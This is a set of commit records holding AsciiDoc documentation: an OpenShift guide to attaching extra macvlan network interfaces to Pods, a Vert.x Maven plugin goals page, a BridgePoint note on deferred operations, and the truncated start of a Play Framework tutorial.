networking\/managing_multinetworking.adoc\n\n[id=\"multinetwork-creating-first-attachments-{context}\"]\n= Creating additional network interfaces\n\nAdditional interfaces for Pods are defined in CNI configurations that are stored\nas Custom Resources (CRs). These CRs can be created, listed, edited, and deleted\nusing the `oc` tool.\n\nThe procedure below configures a `macvlan` interface on a Pod. This\nconfiguration might not apply to all production environments, but you use the\nsame procedure for other CNI plug-ins.\n\n== Creating a CNI configuration for an additional interface as a CR\n\n[NOTE]\n====\nIf you want to attach an additional interface to a Pod, the CR that defines the\ninterface must be in the same project (namespace) as the Pod.\n====\n\n. Create a project to store CNI configurations as CRs and the Pods that will use\nthe CRs.\n+\n----\n$ oc new-project multinetwork-example\n----\n\n. Create the CR that will define an additional network interface. Create a YAML\nfile called `macvlan-conf.yaml` with the following contents:\n+\n[source,yaml]\n----\napiVersion: \"k8s.cni.cncf.io\/v1\"\nkind: NetworkAttachmentDefinition <1>\nmetadata:\n name: macvlan-conf <2>\nspec:\n config: '{ <3>\n \"cniVersion\": \"0.3.0\",\n \"type\": \"macvlan\",\n \"master\": \"eth0\",\n \"mode\": \"bridge\",\n \"ipam\": {\n \"type\": \"host-local\",\n \"subnet\": \"192.168.1.0\/24\",\n \"rangeStart\": \"192.168.1.200\",\n \"rangeEnd\": \"192.168.1.216\",\n \"routes\": [\n { \"dst\": \"0.0.0.0\/0\" }\n ],\n \"gateway\": \"192.168.1.1\"\n }\n }'\n----\n+\n<1> `kind: NetworkAttachmentDefinition`. This is the name for the CR where this\nconfiguration will be stored. It is a custom extension of Kubernetes that\ndefines how networks are attached to Pods.\n<2> `name` maps to the annotation, which is used in the next step.\n<3> `config`: The CNI configuration is packaged in the `config` field.\n+\nThe configuration above is specific to a plug-in, which enables `macvlan`. Note\nthe `type` line in the CNI configuration portion. Aside from the IPAM (IP\naddress management) parameters for networking, in this example the `master`\nfield must reference a network interface that resides on the node(s) hosting the\nPod(s).\n\n. Run the following command to create the CR:\n+\n----\n$ oc create -f macvlan-conf.yaml\n----\n\n[NOTE]\n====\nThis example is based on a `macvlan` CNI plug-in. Note that in AWS environments,\nmacvlan traffic might be filtered and, therefore, might not reach the desired\ndestination.\n====\n\n== Managing the CRs for additional interfaces\n\nYou can manage the CRs for additional interfaces using the `oc` CLI.\n\nUse the following command to list the CRs for additional interfaces:\n\n----\n$ oc get network-attachment-definitions.k8s.cni.cncf.io\n----\n\nUse the following command to delete CRs for additional interfaces:\n\n----\n$ oc delete network-attachment-definitions.k8s.cni.cncf.io macvlan-conf\n----\n\n== Creating an annotated Pod that uses the CR\n\nTo create a Pod that uses the additional interface, use an annotation that\nrefers to the CR. Create a YAML file called `samplepod.yaml` for a Pod with the\nfollowing contents:\n\n[source,yaml]\n----\napiVersion: v1\nkind: Pod\nmetadata:\n name: samplepod\n annotations:\n k8s.v1.cni.cncf.io\/networks: macvlan-conf <1>\nspec:\n containers:\n - name: samplepod\n command: [\"\/bin\/bash\", \"-c\", \"sleep 2000000000000\"]\n image: centos\/tools\n----\n\n<1> The `annotations` field contains `k8s.v1.cni.cncf.io\/networks:\nmacvlan-conf`, which correlates to the `name` field in the CR defined earlier.\n\nRun the following command to create the `samplepod` Pod:\n\n----\n$ oc create -f samplepod.yaml\n----\n\nTo verify that an additional network interface has been created and attached to\nthe Pod, use the following command to list the IPv4 address information:\n\n----\n$ oc exec -it samplepod -- ip -4 addr\n----\n\nThree interfaces are listed in the output:\n\n----\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1000 <1>\n inet 127.0.0.1\/8 scope host lo\n valid_lft forever preferred_lft forever\n3: eth0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1450 qdisc noqueue state UP link-netnsid 0 <2>\n inet 10.244.1.4\/24 scope global eth0\n valid_lft forever preferred_lft forever\n4: net1@if2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN link-netnsid 0 <3>\n inet 192.168.1.203\/24 scope global net1\n valid_lft forever preferred_lft forever\n----\n\n<1> `lo`: A loopback interface.\n<2> `eth0`: The interface that connects to the cluster-wide default network.\n<3> `net1`: The new interface that you just created.\n\n=== Attaching multiple interfaces to a Pod\n\nTo attach more than one additional interface to a Pod, specify multiple names,\nin comma-delimited format, in the `annotations` field in the Pod definition.\n\nThe following `annotations` field in a Pod definition specifies different CRs\nfor the additional interfaces:\n\n[source,yaml]\n----\n annotations:\n k8s.v1.cni.cncf.io\/networks: macvlan-conf, tertiary-conf, quaternary-conf\n----\n\nThe following `annotations` field in a Pod definition specifies the same CR for\nthe additional interfaces:\n\n[source,yaml]\n----\n annotations:\n k8s.v1.cni.cncf.io\/networks: macvlan-conf, macvlan-conf\n----\n\n== Viewing the interface configuration in a running Pod\n\nAfter the Pod is running, you can review the configurations of the additional\ninterfaces created. To view the sample Pod from the earlier example, execute the\nfollowing command.\n\n----\n$ oc describe pod samplepod\n----\n\nThe `metadata` section of the output contains a list of annotations, which are\ndisplayed in JSON format:\n\n[source,yaml]\n----\nAnnotations:\n k8s.v1.cni.cncf.io\/networks: macvlan-conf\n k8s.v1.cni.cncf.io\/networks-status:\n [{\n \"name\": \"openshift-sdn\", <1>\n \"ips\": [\n \"10.131.0.10\"\n ],\n \"default\": true,\n \"dns\": {}\n },{\n \"name\": \"macvlan-conf\",\n \"interface\": \"net1\", <2>\n \"ips\": [ <3>\n \"192.168.1.200\"\n ],\n \"mac\": \"72:00:53:b4:48:c4\", <4>\n \"dns\": {} <5>\n }]\n----\n\n<1> `name` refers to the custom resource name, `macvlan-conf`.\n<2> `interface` refers to the name of the interface in the Pod.\n<3> `ips` is a list of IP addresses as assigned to the Pod.\n<4> `mac` is the MAC address of the interface.\n<5> `dns` refers DNS for the interface.\n\nThe first annotation, `k8s.v1.cni.cncf.io\/networks: macvlan-conf`, refers to the\nCR created in the example. This annotation was specified in the Pod definition.\n\nThe second annotation is `k8s.v1.cni.cncf.io\/networks-status`. There are two\ninterfaces listed under `k8s.v1.cni.cncf.io\/networks-status`.\n\n* The first interface describes the interface for the default network,\n`openshift-sdn`. This interface is created as `eth0`. It is used for\ncommunications within the cluster.\n\n* The second interface is the additional interface that you created, `net1`. The\noutput above lists some key values that were configured when the interface was\ncreated, for example, the IP addresses that were assigned to the Pod.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"23af40db649c658ad767f2a61f5a0f52ced8b389","subject":"Fix typo in doc","message":"Fix typo in doc\n","repos":"kameshsampath\/vertx-maven-plugin","old_file":"src\/main\/asciidoc\/inc\/_vertx-run.adoc","new_file":"src\/main\/asciidoc\/inc\/_vertx-run.adoc","new_contents":"[[vertx:run]]\n== *vertx:run*\nThis goal allows to run the Vert.x application as part of the maven build.\nThe application is always run as a forked process.\n\nThe goal does not have any exclusive configuration, **<<common:run-configurations,Common Run Configuration>>**\ndefines all the applicable configurations for the goal\n\n[cols=\"1,5,2,3\"]\n|===\n| Element | Description | Property| Default\n\n| redeploy\n| Whether or not the redeployment is enabled\n|  \n| false\n\n| redeployScanPeriod\n| The file system check period (in milliseconds)\n| vertx.redeploy.scan.period\n| 1000\n\n| redeployGracePeriod\n| The amount of time (in milliseconds) to wait between 2 re-deployments\n| vertx.redeploy.grace.period\n| 1000\n\n\n| redeployTerminationPeriod\n| the amount of time (in milliseconds) to wait after having stopped the application (before launching user command).\n This is useful on Windows, where the process is not killed immediately.\n| vertx.redeploy.termination.period\n| 0\n\n\n| config\n| The configuration file to use to configure the application. This property is passed as the `-config` option to vertx\nrun.\n|  \n| src\/main\/config\/application.json or src\/main\/config\/application.yml\n\n| jvmArgs\n| The Java Options that will be used when starting the application, these are the values that are\ntypically passed to vert.x applications using --java-opts.\n| vertx.jvmArguments\n| _no arguments_\n|===\n\nWhen the redeployment is enabled, it replays the plugin configured between the _generate-source_ and\n_process-classes_ phases.\n\nSo to start a Vert.x application just launch:\n\n[source]\n----\nmvn vertx:run\n----\n\nIf the sources are not compiled, the plugin executes `mvn compile` for you.\n\n**IMPORTANT**: `vertx:run` starts the application in a forked JVM.\n\n[[vertx:debug]]\n== *vertx:debug*\nThis goal allows to debug the Vert.x application.\n\nThe goal does not have any exclusive configuration, **<<common:run-configurations,Common Run Configuration>>**\ndefines all the applicable configurations for the goal\n\n[cols=\"1,5,2,3\"]\n|===\n| Element | Description | Property| Default\n\n| config\n| The configuration file to use to configure the application. This property is passed as the `-config` option to vertx\nrun.\n|  \n| src\/main\/config\/application.json or src\/main\/config\/application.yml\n\n| jvmArgs\n| The Java Options that will be used when starting the application, these are the values that are\ntypically passed to vert.x applications using --java-opts.\n| vertx.jvmArguments\n| _no arguments_\n\n| debugPort\n| The debugger port\n| debug.port\n| 5005\n\n| debugSuspend\n| Whether or not the application must wait until a debugger is attached to start\n| debug.suspend\n| false\n|===\n\n**IMPORTANT**: the redeploy mode and debug cannot be used together. When `vertx:debug` is launched, the redeployment\nmode is disabled.\n","old_contents":"[[vertx:run]]\n== *vertx:run*\nThis goal allows to run the Vert.x application as part of the maven build.\nThe application is always run as a forked process.\n\nThe goal does not have any exclusive configuration, **<<common:run-configurations,Common Run Configuration>>**\ndefines all the applicable configurations for the goal\n\n[cols=\"1,5,2,3\"]\n|===\n| Element | Description | Property| Default\n\n| redeploy\n| Whether or not the redeployment is enabled\n|  \n| false\n\n| redeployScanPeriod\n| The file system check period (in milliseconds)\n| vertx.redeploy.scan.period\n| 1000\n\n| redeployGracePeriod\n| The amount of time (in milliseconds) to wait between 2 re-deployments\n| vertx.redeploy.grace.period\n| 1000\n\n\n| redeployTerminationPeriod\n| the amount of time (in millisecods) to wait after having stopped the application (before launching user command).\n This is useful on Windows, where the process is not killed immediately.\n| vertx.redeploy.termination.period\n| 0\n\n\n| config\n| The configuration file to use to configure the application. This property is passed as the `-config` option to vertx\nrun.\n|  \n| src\/main\/config\/application.json or src\/main\/config\/application.yml\n\n| jvmArgs\n| The Java Options that will be used when starting the application, these are the values that are\ntypically passed to vert.x applications using --java-opts.\n| vertx.jvmArguments\n| _no arguments_\n|===\n\nWhen the redeployment is enabled, it replays the plugin configured between the _generate-source_ and\n_process-classes_ phases.\n\nSo to start a Vert.x application just launch:\n\n[source]\n----\nmvn vertx:run\n----\n\nIf the sources are not compiled, the plugin executes `mvn compile` for you.\n\n**IMPORTANT**: `vertx:run` starts the application in a forked JVM.\n\n[[vertx:debug]]\n== *vertx:debug*\nThis goal allows to debug the Vert.x application.\n\nThe goal does not have any exclusive configuration, **<<common:run-configurations,Common Run Configuration>>**\ndefines all the applicable configurations for the goal\n\n[cols=\"1,5,2,3\"]\n|===\n| Element | Description | Property| Default\n\n| config\n| The configuration file to use to configure the application. This property is passed as the `-config` option to vertx\nrun.\n|  \n| src\/main\/config\/application.json or src\/main\/config\/application.yml\n\n| jvmArgs\n| The Java Options that will be used when starting the application, these are the values that are\ntypically passed to vert.x applications using --java-opts.\n| vertx.jvmArguments\n| _no arguments_\n\n| debugPort\n| The debugger port\n| debug.port\n| 5005\n\n| debugSuspend\n| Whether or not the application must wait until a debugger is attached to start\n| debug.suspend\n| false\n|===\n\n**IMPORTANT**: the redeploy mode and debug cannot be used together. When `vertx:debug` is launched, the redeployment\nmode is disabled.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f34cce12e27719e3cc221cb169a465dd2817e7fc","subject":"job #11841 fix typo in note","message":"job #11841 fix typo in note\n","repos":"leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,rmulvey\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,keithbrown\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,lwriemen\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,rmulvey\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,travislondon\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,cortlandstarrett\/bridgepoint,rmulvey\/bridgepoint,keithbrown\/bridgepoint,keithbrown\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,keithbrown\/bridgepoint,travislondon\/bridgepoint,travislondon\/bridgepoint,rmulvey\/bridgepoint,lwriemen\/bridgepoint","old_file":"doc-bridgepoint\/notes\/11841_deferred_ops.adoc","new_file":"doc-bridgepoint\/notes\/11841_deferred_ops.adoc","new_contents":"= Support deferred operations in BridgePoint (part 1)\n\nxtUML Project Implementation Note\n\n== 1 Abstract\n\nDeferred operations are supported in MASL and there is desire for them to be\nsupported by xtUML\/OAL. Additionally, the Ciera model compiler (which is\nitself an xtUML\/OAL model) uses them. Up to this point, they have been\nmaintained by hand, but this feature will give them official support within\nBridgePoint.\n\n== 2 Introduction and Background\n\nOriginal analysis note found at <<dr-1>>.\n\nCiera project found at <<dr-2>>.\n\n== 3 Requirements\n\nThese requirements are a modified subset of the requirements proposed in the\noriginal analysis note <<dr-1>>.\n\n3.1 BridgePoint shall supply a CME to mark an instance based operation as a deferred operation. +\n3.1.1 The option to mark an operation as a deferred operation shall be available only if the following conditions are met: +\n3.1.1.1 The operation is not already a deferred operation. +\n3.1.1.2 The operation is an instance based operation. +\n3.1.1.3 The class on which the operation is defined is participating as a supertype in at least one subsuper association. +\n3.1.2 BridgePoint shall allow the user to choose which supsuper association to defer the operation across. +\n3.1.2.1 BridgePoint shall only allow an operation to defer across one supsuper association at a given time. +\n3.1.3 BridgePoint shall allow the user to choose whether the deferral is \"required\" or \"optional\". +\n3.2 BridgePoint shall supply a CME to mark a deferred to operation as local (non-deferred). +\n3.2.1 The option to mark an operation as a local operation shall be available only if the operation is already marked as deferred. +\n3.3 Details of deferrals applied to operations shall be visible in the Properties view. +\n3.4 Ciera shall support deferred operation behavior. +\n3.4.1 If a deferred operation is invoked, the subtype of the current instance shall be selected and the operation on the subtype instance shall be invoked. +\n3.4.1.1 If there is no subtype instance related, Ciera shall throw an error. +\n3.4.1.2 If the deferred operation is marked \"optional\" and there is no deferred to operation in the subtype instance, the deferred operation itself shall be executed. +\n3.4.2 Deferred to operations shall be invocable directly. +\n3.4.3 Deferred operations which return values, have parameters, or use array types shall be supported. +\n\n== 4 Work Required\n\n4.1 Model deferral\n\n`O_DEF` was added to the Subsystem subsystem as shown in the BridgePoint diagram\nin the analysis note <<dr-1>>. Another attribute \"required\" was added to capture\nwhether or not the deferred operation requires each subtype to provide an\nimplementation.\n\n4.2 CMEs\n\n`MakeDeferred` and `MakeLocal` CMEs were introduced along with corresponding\noperations on `O_TFR` and action filter (to determine when the CMEs are\nvisible). PEI data was updated for the new CMEs.\n\n4.3 Persistence\n\nThe new `O_DEF` class was added to the persistence tree PEI data as a child of\n`O_TFR`.\n\n4.4 Properties\n\nThe appropriate PEI data was updated to include deferrals in the properties view\n\n4.5 OOA schema\n\nThe schema was updated to include `O_DEF`.\n\n== 5 Implementation Comments\n\n5.1 An MC-Java bug was fixed in the process. The bug was that enumerator values\nwere generated starting at 1 and not 0. This is not consistent with MC-3020 (and\nother model compiler tools), so it makes it impossible to load BridgePoint data\nwith the MC-3020 SQL loader. The original bug report can be seen at <<dr-4>>.\n\n== 6 Unit Test\n\n6.0 Import the model attached to the issue <<dr-3>> into a new workspace.\n\n6.1 UI testing +\n6.1.1 Right click `op1`. Confirm that \"Make Deferred...\" CME is available. +\n6.1.2 Select \"Make Deferred...\", click Finish. Confirm that `op1` operations\nappeared in classes `B` and `C`. With `A::op1` selected, confirm that the\ndeferral is viewable in properties and that the value for \"Required\" is\n\"Required\". +\n6.1.3 Right click on `op2`. Confirm that \"Make Deferred...\" CME is _not_ available. +\n6.1.4 Right click on `class_based_op`. Confirm that \"Make Deferred...\" CME is _not_ available. +\n6.1.5 Right click on `subtype_op`. Confirm that \"Make Deferred...\" CME is _not_ available. +\n6.1.6 Right click on `op_no_rel`. Confirm that \"Make Deferred...\" CME is _not_ available. +\n6.1.7 Right click on `op3` and select \"Make Deferred...\". Confirm that the\ndropdown box for \"Relationship\" contains both `R2` and `R3`. Select `R3`,\nuncheck \"Required\", and click Finish. Navigate to the deferral in properties and\nconfirm that the value for \"Required\" is \"Optional\". +\n6.1.8 Right click on `E::op3` again and select \"Make Local\". Confirm that the\ndeferral disappears from the properties view. +\n6.1.9 Right click on `op_no_rel` again and select confirm that the \"Make Local\"\nCME is _not_ available. +\n\n6.2 Ciera behavior test +\n6.2.1 Build the project by running `mvn install` in the project directory. +\nVerify that it builds cleanly with no errors (no \"FAIL\" tests). +\n6.2.2 Run the project by running `bash run.sh` in the project directory. Confirm\nthat all tests pass. +\n6.2.3 Uncomment lines 44 and 45 in `init`. Build and run again. Confirm that an\nerror is thrown and the program exits. The error should look something like the\nfollowing: +\n```\nNo subtype selected\nio.ciera.runtime.summit.exceptions.XtumlException: No subtype selected\n...\n```\n\n== 7 User Documentation\n\nEntries were added in the BridgePoint CME documentation for \"Make Deferred...\"\nand \"Make Local\".\n\n== 8 Code Changes\n\n- fork\/repository: leviathan747\/bridgepoint +\n- branch: 11841_deferred_ops +\n\n----\n doc-bridgepoint\/notes\/10129_deferred_ops\/10129_deferred_ops_ant.md | 232 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n doc-bridgepoint\/notes\/10129_deferred_ops\/model.png | Bin 0 -> 342704 bytes\n doc-bridgepoint\/notes\/10129_deferred_ops\/op.png | Bin 0 -> 408085 bytes\n doc-bridgepoint\/notes\/10129_deferred_ops\/paper_model.jpg | Bin 0 -> 2849802 bytes\n doc-bridgepoint\/notes\/11841_deferred_ops.adoc | 139 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/MC-Java\/enums.inc | 2 +-\n src\/MC-Java\/ooa_schema.sql | 7 +++\n src\/org.xtuml.bp.core\/models\/org.xtuml.bp.core\/ooaofooa\/Functions\/Context Menu Entry Functions\/Context Menu Entry Functions.xtuml | 38 ++++++++++++++++\n src\/org.xtuml.bp.core\/models\/org.xtuml.bp.core\/ooaofooa\/Subsystem\/Deferral\/Deferral.xtuml | 180 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.core\/models\/org.xtuml.bp.core\/ooaofooa\/Subsystem\/Operation\/Operation.xtuml | 101 +++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.core\/models\/org.xtuml.bp.core\/ooaofooa\/Subsystem\/Subsystem.xtuml | 406 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.core\/sql\/context_menu.pei.sql | 4 ++\n src\/org.xtuml.bp.core\/sql\/ooaofooa_hierarchy.pei.sql | 3 ++\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/inspector\/.gitignore | 1 +\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/.gitignore | 4 ++\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/BridgePointContextMenuTools\/BridgePointContextMenuTools.html | 8 ++++\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/BridgePointContextMenuTools\/BridgePointContextMenuTools.md | 2 +\n src\/org.xtuml.bp.io.mdl\/sql\/file_io.pei.sql | 3 +-\n src\/org.xtuml.bp.io.mdl\/sql\/stream.pei.sql | 3 +-\n 19 files changed, 1130 insertions(+), 3 deletions(-)\n----\n\n== 9 Document References\n\n. [[dr-1]] link:10129_deferred_ops\/10129_deferred_ops_ant.md[Deferred operations analysis note]\n. [[dr-2]] https:\/\/github.com\/xtuml\/ciera\/[Ciera project homepage]\n. [[dr-3]] https:\/\/support.onefact.net\/issues\/11841[Support deferred operations in BridgePoint (part 1)]\n. [[dr-4]] https:\/\/support.onefact.net\/issues\/10298[MC-Java generated enumerator values do not start from 0]\n\n---\n\nThis work is licensed under the Creative Commons CC0 License\n\n---\n","old_contents":"= Support deferred operations in BridgePoint (part 1)\n\nxtUML Project Implementation Note\n\n== 1 Abstract\n\nDeferred operations are supported in MASL and there is desire for them to be\nsupported by xtUML\/OAL. Additionally, the Ciera model compiler (which is\nitself an xtUML\/OAL model) uses them. Up to this point, they have been\nmaintained by hand, but this feature will give them official support within\nBridgePoint.\n\n== 2 Introduction and Background\n\nOriginal analysis note found at <<dr-1>>.\n\nCiera project found at <<dr-2>>.\n\n== 3 Requirements\n\nThese requirements are a modified subset of the requirements proposed in the\noriginal analysis note <<dr-1>>.\n\n3.1 BridgePoint shall supply a CME to mark an instance based operation as a deferred operation. +\n3.1.1 The option to mark an operation as a deferred operation shall be available only if the following conditions are met: +\n3.1.1.1 The operation is not already a deferred operation. +\n3.1.1.2 The operation is an instance based operation. +\n3.1.1.3 The class on which the operation is defined is participating as a supertype in at least one subsuper association. +\n3.1.2 BridgePoint shall allow the user to choose which supsuper association to defer the operation across. +\n3.1.2.1 BridgePoint shall only allow an operation to defer across one supsuper association at a given time. +\n3.1.3 BridgePoint shall allow the user to choose whether the deferral is \"required\" or \"optional\". +\n3.2 BridgePoint shall supply a CME to mark a deferred to operation as local (non-deferred). +\n3.2.1 The option to mark an operation as a local operation shall be available only if the operation is already marked as deferred. p\n3.3 Details of deferrals applied to operations shall be visible in the Properties view. +\n3.4 Ciera shall support deferred operation behavior. +\n3.4.1 If a deferred operation is invoked, the subtype of the current instance shall be selected and the operation on the subtype instance shall be invoked. +\n3.4.1.1 If there is no subtype instance related, Ciera shall throw an error. +\n3.4.1.2 If the deferred operation is marked \"optional\" and there is no deferred to operation in the subtype instance, the deferred operation itself shall be executed. +\n3.4.2 Deferred to operations shall be invocable directly. +\n3.4.3 Deferred operations which return values, have parameters, or use array types shall be supported. +\n\n== 4 Work Required\n\n4.1 Model deferral\n\n`O_DEF` was added to the Subsystem subsystem as shown in the BridgePoint diagram\nin the analysis note <<dr-1>>. Another attribute \"required\" was added to capture\nwhether or not the deferred operation requires each subtype to provide an\nimplementation.\n\n4.2 CMEs\n\n`MakeDeferred` and `MakeLocal` CMEs were introduced along with corresponding\noperations on `O_TFR` and action filter (to determine when the CMEs are\nvisible). PEI data was updated for the new CMEs.\n\n4.3 Persistence\n\nThe new `O_DEF` class was added to the persistence tree PEI data as a child of\n`O_TFR`.\n\n4.4 Properties\n\nThe appropriate PEI data was updated to include deferrals in the properties view\n\n4.5 OOA schema\n\nThe schema was updated to include `O_DEF`.\n\n== 5 Implementation Comments\n\n5.1 An MC-Java bug was fixed in the process. The bug was that enumerator values\nwere generated starting at 1 and not 0. This is not consistent with MC-3020 (and\nother model compiler tools), so it makes it impossible to load BridgePoint data\nwith the MC-3020 SQL loader. The original bug report can be seen at <<dr-4>>.\n\n== 6 Unit Test\n\n6.0 Import the model attached to the issue <<dr-3>> into a new workspace.\n\n6.1 UI testing +\n6.1.1 Right click `op1`. Confirm that \"Make Deferred...\" CME is available. +\n6.1.2 Select \"Make Deferred...\", click Finish. Confirm that `op1` operations\nappeared in classes `B` and `C`. With `A::op1` selected, confirm that the\ndeferral is viewable in properties and that the value for \"Required\" is\n\"Required\". +\n6.1.3 Right click on `op2`. Confirm that \"Make Deferred...\" CME is _not_ available. +\n6.1.4 Right click on `class_based_op`. Confirm that \"Make Deferred...\" CME is _not_ available. +\n6.1.5 Right click on `subtype_op`. Confirm that \"Make Deferred...\" CME is _not_ available. +\n6.1.6 Right click on `op_no_rel`. Confirm that \"Make Deferred...\" CME is _not_ available. +\n6.1.7 Right click on `op3` and select \"Make Deferred...\". Confirm that the\ndropdown box for \"Relationship\" contains both `R2` and `R3`. Select `R3`,\nuncheck \"Required\", and click Finish. Navigate to the deferral in properties and\nconfirm that the value for \"Required\" is \"Optional\". +\n6.1.8 Right click on `E::op3` again and select \"Make Local\". Confirm that the\ndeferral disappears from the properties view. +\n6.1.9 Right click on `op_no_rel` again and select confirm that the \"Make Local\"\nCME is _not_ available. +\n\n6.2 Ciera behavior test +\n6.2.1 Build the project by running `mvn install` in the project directory. +\nVerify that it builds cleanly with no errors (no \"FAIL\" tests). +\n6.2.2 Run the project by running `bash run.sh` in the project directory. Confirm\nthat all tests pass. +\n6.2.3 Uncomment lines 44 and 45 in `init`. Build and run again. Confirm that an\nerror is thrown and the program exits. The error should look something like the\nfollowing: +\n```\nNo subtype selected\nio.ciera.runtime.summit.exceptions.XtumlException: No subtype selected\n...\n```\n\n== 7 User Documentation\n\nEntries were added in the BridgePoint CME documentation for \"Make Deferred...\"\nand \"Make Local\".\n\n== 8 Code Changes\n\n- fork\/repository: leviathan747\/bridgepoint +\n- branch: 11841_deferred_ops +\n\n----\n doc-bridgepoint\/notes\/10129_deferred_ops\/10129_deferred_ops_ant.md | 232 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n doc-bridgepoint\/notes\/10129_deferred_ops\/model.png | Bin 0 -> 342704 bytes\n doc-bridgepoint\/notes\/10129_deferred_ops\/op.png | Bin 0 -> 408085 bytes\n doc-bridgepoint\/notes\/10129_deferred_ops\/paper_model.jpg | Bin 0 -> 2849802 bytes\n doc-bridgepoint\/notes\/11841_deferred_ops.adoc | 139 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/MC-Java\/enums.inc | 2 +-\n src\/MC-Java\/ooa_schema.sql | 7 +++\n src\/org.xtuml.bp.core\/models\/org.xtuml.bp.core\/ooaofooa\/Functions\/Context Menu Entry Functions\/Context Menu Entry Functions.xtuml | 38 ++++++++++++++++\n src\/org.xtuml.bp.core\/models\/org.xtuml.bp.core\/ooaofooa\/Subsystem\/Deferral\/Deferral.xtuml | 180 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.core\/models\/org.xtuml.bp.core\/ooaofooa\/Subsystem\/Operation\/Operation.xtuml | 101 +++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.core\/models\/org.xtuml.bp.core\/ooaofooa\/Subsystem\/Subsystem.xtuml | 406 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n src\/org.xtuml.bp.core\/sql\/context_menu.pei.sql | 4 ++\n src\/org.xtuml.bp.core\/sql\/ooaofooa_hierarchy.pei.sql | 3 ++\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/inspector\/.gitignore | 1 +\n src\/org.xtuml.bp.core\/src\/org\/xtuml\/bp\/core\/ui\/.gitignore | 4 ++\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/BridgePointContextMenuTools\/BridgePointContextMenuTools.html | 8 ++++\n src\/org.xtuml.bp.doc\/Reference\/UserInterface\/BridgePointContextMenuTools\/BridgePointContextMenuTools.md | 2 +\n src\/org.xtuml.bp.io.mdl\/sql\/file_io.pei.sql | 3 +-\n src\/org.xtuml.bp.io.mdl\/sql\/stream.pei.sql | 3 +-\n 19 files changed, 1130 insertions(+), 3 deletions(-)\n----\n\n== 9 Document References\n\n. [[dr-1]] link:10129_deferred_ops\/10129_deferred_ops_ant.md[Deferred operations analysis note]\n. [[dr-2]] https:\/\/github.com\/xtuml\/ciera\/[Ciera project homepage]\n. [[dr-3]] https:\/\/support.onefact.net\/issues\/11841[Support deferred operations in BridgePoint (part 1)]\n. [[dr-4]] https:\/\/support.onefact.net\/issues\/10298[MC-Java generated enumerator values do not start from 0]\n\n---\n\nThis work is licensed under the Creative Commons CC0 License\n\n---\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4f535591d3ea459e138ca14322306a124b4e8a96","subject":"Update 2016-10-03-Play-Framework-Beginner-Tutorial-Make-a-post-request-and-save-the-form-data-in-Mongodb.adoc","message":"Update 2016-10-03-Play-Framework-Beginner-Tutorial-Make-a-post-request-and-save-the-form-data-in-Mongodb.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-10-03-Play-Framework-Beginner-Tutorial-Make-a-post-request-and-save-the-form-data-in-Mongodb.adoc","new_file":"_posts\/2016-10-03-Play-Framework-Beginner-Tutorial-Make-a-post-request-and-save-the-form-data-in-Mongodb.adoc","new_contents":"= Play Framework - Beginner Tutorial : Make a post request and save the form data in Mongodb\n:published_at: 2016-10-03\n:hp-tags: play\n\n== Before the tutorial\n\nYou should : - read - https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaActions[Play Documentation : ScalaActions] - https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaForms[Play Documentation : ScalaForms] - https:\/\/www.playframework.com\/documentation\/2.5.x\/ScalaForms[Play Documentation : ScalaJsonAutomated] - have basic understanding of scala future transformation (map, flatMap) - have basic understanding of scala implicits - https:\/\/github.com\/harrylaou\/play2.5-skeleton-compileDI[clone play2.5-skeleton-compileDI]. \n\nThis example uses 